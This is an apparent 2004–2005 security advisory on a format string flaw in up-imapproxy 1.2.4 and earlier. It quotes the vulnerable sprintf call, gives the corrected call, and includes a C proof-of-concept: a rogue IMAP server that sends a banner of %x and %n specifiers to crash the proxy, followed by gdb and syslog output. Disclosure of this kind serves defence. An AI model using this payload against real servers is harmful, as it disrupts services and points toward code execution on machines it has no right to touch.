A format string vulnerability exists in Imapproxy versions 1.2.4 and below. Proof of concept exploit included.
a957e64eb23300ef5bd04f9396a66646f9eb4e1d06921f1eaf18205dd93c00f5
[.:: ExploiterZ Labs aka Unl0ck Research Team ::.]
Advisory
target: Imapproxy
version: 1.2.4 and earlier
type: format string
remote: yes
vendor: http://imapproxy.org
patch: doesn't exists
[.: Details :.]
Fromat string vulnerability was found in latest version
of IMAP proxy server (up-imapproxy).
Vulnerability exists in:
/up-imapproxy-1.2.4/src/main.c
function: ParseBannerAndCapability();
static int ParseBannerAndCapability( char *DestBuf,
unsigned int DestBufSize,
char *SourceBuf,
unsigned int SourceBufSize )
{
...
SourceBuf[SourceBufSize - 2] = '\0';
CP = strtok( SourceBuf, " " );
...
sprintf( DestBuf, CP );
...
}
This function uses in another function from main.c.
function: SetBannerAndCapability()
static void SetBannerAndCapability( void )
{
...
BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
itd.ReadBuf, BytesRead );
...
if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) )
{
syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner);
close( itd.conn->sd );
exit( 1 );
}
...
}
As you can see ParseBannerAndCapability() function calls vulnerable sprintf() without format string.
Correct call must be:
sprintf( DestBuf, "%s", CP );
instead
sprintf( DestBuf, CP );
Vulnerability can be used to execute arbitary code on target's machine.
Imapproxy incorrectly parse banner from IMAP daemon. Look at below PoC code.
[.: PoC :.]
/*
PoC exploit code for up-imapproxy <= 1.2.4
by Darkeagle from ExploiterZ Labs
eagle [ at ] exploiterz [ dot ] org
an exploit binds port (143) and when imapproxy connects to this exploit-server and gets banner, it's child process crashes..
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"
int main ( int argc, char *argv[] )
{
struct sockaddr_in addr, cl_addr;
int sock, cl_sock, addr_size;
char *Iaddr;
socklen_t l;
printf("Imapproxy <= 1.2.4 PoC Exploit\n");
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(143);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5);
addr_size = sizeof(addr);
while (1)
{
cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
Iaddr = inet_ntoa(cl_addr.sin_addr);
send(cl_sock, BANNER, strlen(BANNER), 0);
printf("IP: %s\n", Iaddr);
}
return 0;
}
[.: Screenshot :.]
.. Child Process crashed ..
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1076593408 (LWP 8279)]
0x401b5904 in vfprintf () from /lib/tls/libc.so.6
(gdb)
...
.. Syslog details ..
[root@localhost bin]# tail -10 /var/log/syslog
....
Oct 28 14:12:55 localhost in.imapproxyd[9201]: SetBannerAndCapability(): Unexpected response from imap server on initial connection: AAAAAAAAAbfffc4ccbfffc4ccbfffc4b45bfffd4e8804afb98056E60^M -- Exiting.
[root@localhost bin]#
[.: Credits :.]
Goes to Darkeagle [ eagle { at } exploiterz { dot } org ]
http://exploiterz.org || http://55k7.org
(c) 2004-2005 Unl0ck Research Team